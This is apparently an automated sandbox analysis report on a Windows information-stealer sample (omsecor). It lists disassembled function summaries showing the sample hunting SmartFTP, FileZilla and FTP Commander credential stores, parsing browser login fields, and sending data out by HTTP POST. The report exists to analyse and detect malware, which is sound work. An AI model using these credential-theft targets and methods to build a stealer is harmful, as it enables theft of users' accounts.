                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • folder, xrefs: 00405184
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0.3%
                          Signature Coverage:0%
                          Total number of Nodes:1163
                          Total number of Limit Nodes:12
4545->4547 4547->4532 4548 40615c GetStringTypeA 4552 406177 4548->4552 4548->4560 4553 40609f _memset __alloca_probe_16 4549->4553 4554 406654 _malloc 67 API calls 4549->4554 4551 4060d8 MultiByteToWideChar 4556 4060ee GetStringTypeW 4551->4556 4557 4060ff 4551->4557 4558 403f64 ___free_lconv_mon 67 API calls 4552->4558 4553->4551 4553->4560 4554->4553 4556->4557 4561 405ef0 4557->4561 4558->4560 4560->4545 4562 405f09 4561->4562 4563 405ef8 4561->4563 4562->4560 4563->4562 4564 403f64 ___free_lconv_mon 67 API calls 4563->4564 4564->4562 4566 406eb4 4565->4566 4567 406eaf 4565->4567 4596 406e72 4566->4596 4569 401662 setSBUpLow 5 API calls 4567->4569 4570 40612f 4569->4570 4570->4548 4570->4560 4571 406eca 4570->4571 4572 406f08 GetCPInfo 4571->4572 4576 406f92 4571->4576 4573 406f7d MultiByteToWideChar 4572->4573 4574 406f1f 4572->4574 4573->4576 4578 406f38 _strlen 4573->4578 4574->4573 4577 406f25 GetCPInfo 4574->4577 4575 401662 setSBUpLow 5 API calls 4579 406150 4575->4579 4576->4575 4577->4573 4580 406f32 4577->4580 4581 406f6a _memset __alloca_probe_16 4578->4581 4582 406654 _malloc 67 API calls 4578->4582 4579->4548 4579->4560 4580->4573 4580->4578 4581->4576 4583 406fc7 MultiByteToWideChar 4581->4583 4582->4581 4584 406ffe 4583->4584 4585 406fdf 4583->4585 4586 405ef0 __freea 67 API calls 4584->4586 4587 407003 4585->4587 4588 406fe6 WideCharToMultiByte 4585->4588 4586->4576 4589 407022 4587->4589 4590 40700e WideCharToMultiByte 4587->4590 4588->4584 4591 404032 __calloc_crt 67 API calls 4589->4591 4590->4584 4590->4589 4592 40702a 4591->4592 4592->4584 4593 407033 WideCharToMultiByte 4592->4593 4593->4584 4594 407045 4593->4594 4595 403f64 ___free_lconv_mon 67 API calls 4594->4595 4595->4584 4599 407396 4596->4599 4600 4073ad 4599->4600 4603 40716b 4600->4603 4604 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4603->4604 4607 40717e 4604->4607 4605 407190 4606 40427c _raise 67 API calls 4605->4606 4608 407195 4606->4608 4607->4605 4611 4071cd 
4607->4611 4609 40421d _raise 67 API calls 4608->4609 4614 406e7f 4609->4614 4610 40707c __isctype_l 91 API calls 4610->4611 4611->4610 4612 407212 4611->4612 4613 40427c _raise 67 API calls 4612->4613 4612->4614 4613->4614 4614->4567 4616 40623f LCMapStringW 4615->4616 4620 40625a 4615->4620 4617 406262 GetLastError 4616->4617 4616->4620 4617->4620 4618 406457 4622 406e83 ___ansicp 91 API calls 4618->4622 4619 4062b4 4621 4062cd MultiByteToWideChar 4619->4621 4644 40644e 4619->4644 4620->4618 4620->4619 4630 4062fa 4621->4630 4621->4644 4624 40647f 4622->4624 4623 401662 setSBUpLow 5 API calls 4625 403964 4623->4625 4626 406573 LCMapStringA 4624->4626 4627 406498 4624->4627 4624->4644 4625->4526 4661 4064cf 4626->4661 4628 406eca ___convertcp 74 API calls 4627->4628 4632 4064aa 4628->4632 4629 40634b MultiByteToWideChar 4633 406364 LCMapStringW 4629->4633 4655 406445 4629->4655 4631 406654 _malloc 67 API calls 4630->4631 4639 406313 __alloca_probe_16 4630->4639 4631->4639 4635 4064b4 LCMapStringA 4632->4635 4632->4644 4637 406385 4633->4637 4633->4655 4634 40659a 4641 403f64 ___free_lconv_mon 67 API calls 4634->4641 4634->4644 4647 4064d6 4635->4647 4635->4661 4636 405ef0 __freea 67 API calls 4636->4644 4640 40638d 4637->4640 4646 4063b6 4637->4646 4638 403f64 ___free_lconv_mon 67 API calls 4638->4634 4639->4629 4639->4644 4645 40639f LCMapStringW 4640->4645 4640->4655 4641->4644 4642 4064e7 _memset __alloca_probe_16 4654 406525 LCMapStringA 4642->4654 4642->4661 4643 4063d1 __alloca_probe_16 4648 406405 